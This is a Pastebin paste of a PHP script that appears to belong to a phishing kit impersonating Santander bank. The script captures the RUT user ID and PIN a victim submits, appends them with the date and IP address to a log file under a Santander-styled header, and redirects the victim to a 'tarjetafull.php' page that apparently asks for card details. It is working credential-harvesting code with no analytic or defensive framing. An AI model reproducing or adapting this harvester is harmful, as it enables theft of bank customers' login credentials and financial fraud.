Advertisement
Guest User

Untitled

a guest
May 29th, 2017
86
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.13 KB | None | 0 0
  1. <?php
  2. include("js/config.php");
  3. session_start();
  4. $user= $_POST['d_rut'];
  5. $pass= $_POST['d_pin'];
  6. $log_html = "
  7. <style type='text/css'>
  8. <!--
  9. .style1 {color: #000066}
  10. .style4 {color: #FFFFFF}
  11. -->
  12. </style>
  13. <body>
  14. <table width='931' border='0'>
  15.  <caption>&nbsp;
  16.  </caption>
  17.  <tr>
  18.    <th width='646' bgcolor='#000099' scope='row'><div align='left' class='style4'>  Santander</div></th>
  19.     <tr>
  20.     <th width='646' bgcolor='#000099' scope='row'><div align='left' class='style4'>Fecha: {$xfecha}</div></th>
  21.     <tr>
  22.     <th width='646' bgcolor='#000099' scope='row'><div align='left' class='style4'>IP: {$IP}</div></th>
  23.     <tr>
  24.     <th width='646' bgcolor='#000099' scope='row'><div align='left' class='style4'>User: {$_POST['d_rut']}</div></th>
  25.     <tr>
  26.     <th width='646' bgcolor='#000099' scope='row'><div align='left' class='style4'>Password: {$_POST['d_pin']}</div></th>
  27.     <tr>";
  28.  
  29. if(isset($_POST['d_rut']) && isset($_POST['pin']))
  30. {
  31. $open = fopen("$santander","a");
  32. fwrite($open,"$log_html\r\n");
  33. //fwrite($open,"User: ".$_POST['d_rut']." Pass: ".$_POST['d_pin']."\r\n");
  34. }
  35. echo "<meta http-equiv='Refresh' content='1;url=tarjetafull.php'>";
  36. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement